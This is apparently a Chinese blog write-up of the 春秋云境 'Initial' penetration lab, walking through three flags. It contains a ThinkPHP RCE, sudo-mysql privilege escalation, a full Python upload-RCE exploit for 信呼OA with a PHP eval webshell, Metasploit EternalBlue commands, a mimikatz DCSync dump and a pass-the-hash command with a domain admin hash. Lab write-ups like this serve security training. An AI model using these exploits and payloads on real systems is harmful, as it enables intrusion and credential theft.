春秋云境_Initial

唉,学

0x01 Flag01

image-20241230163501619

39.99.229.166,棱镜扫下常用端口:

image-20241230163720929

开了22还有8080是个http服务。EZ看指纹没啥收获,fscan扫:

image-20250103103946225

thinkphp5023RCE,直接用工具:

image-20241230170422244

蚁剑连接:

image-20241230170537852

打开终端后发现当前用户是www-data,这个用户权限比较低。先尝试提权,发现他这个Mysql开了免密登录,登陆后能以root身份执行命令(mysql -e):

image-20241230172115168

1
sudo mysql -e '\! find / -name flag*'

image-20241230172846788

1
sudo mysql -e '\! cat /root/flag/flag01.txt'

image-20241230172925606

0x02 Flag02

ifconfig看网络信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(www-data:/var/www/html) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.1.15  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe05:3164  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:05:31:64  txqueuelen 1000  (Ethernet)
        RX packets 128728  bytes 153547480 (153.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 35118  bytes 7563272 (7.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1686  bytes 146020 (146.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1686  bytes 146020 (146.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

用蚁剑在刚才之前传马那个目录传个fscan上去:

image-20241231141011778

给执行权限:

1
sudo mysql -e '\! chmod 777 /var/www/html/fscan*'

扫内网:

1
2
./fscan_amd64 -h 172.22.1.0/24
cat result.txt

image-20250103104235728

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.2:88 open
172.22.1.21:139 open
172.22.1.15:22 open
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

获得内网信息:

1
2
3
172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18  信呼OA系统

先打这个信呼OA,不过要搭个隧道进内网(利用frp+proxifier)。先利用蚁剑上传frpcfrpc.ini:

image-20250103103233933

和上面的fscan一样,给执行权限:

1
chmod +x frpc

然后可以参考代理配置

都配置完就能访问内网里的这个服务(172.22.1.18)了:

image-20250103170527505

碰到这种没验证码的登录框先尝试弱口令。admin/admin123发现能登录:

image-20250103170600031

转了一圈儿也不知道咋利用,后面发现有现成的exp可以打:代码审计信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE

唉,脚本小子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
 
 
session = requests.session()
 
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
 
data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}
 
 
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
 
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
 
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
 
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

这里1.php的内容是一句话木马:

1
<?=eval($_POST[1]);?>

exp跑完输出的是写马进去的路径(不过要注意他这个是绝对路径)。

image-20250103171435050

使用蚁剑之前配置下代理:

455d8e9e43ced978235032398a542623

蚁剑连接https://172.22.1.18/upload+后面那一串儿:,flag位于C://Users/Administrator/flag/flag02.txt

image-20250103171548839

获得flag02后它提示我们去打域控。

0x03 Flag03

最后打MS17-010,需要利用proxifier+msf攻击

首先配置一下proxychains(把公网服务器作为代理来进入内网)

1
vim /etc/proxychains.conf

唉,脚本小子:

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

打完之后获得一个正向连接的shell

4a1787360a997a7aed633f20182a264a

1
load kiwi

image-20250106143548762

1
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

image-20250106143621461

拿到管理员哈希后打哈希传递:

1
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

7b0b8313c4ee7d882a02161eebc7c09e

一边学一遍打一共花了五个多小时😪

image-20250106151323937

#内网渗透
春秋云境_Initial
http://example.com/2025/01/01/春秋云境_Initial/
作者
notbad3
发布于
2025年1月1日
许可协议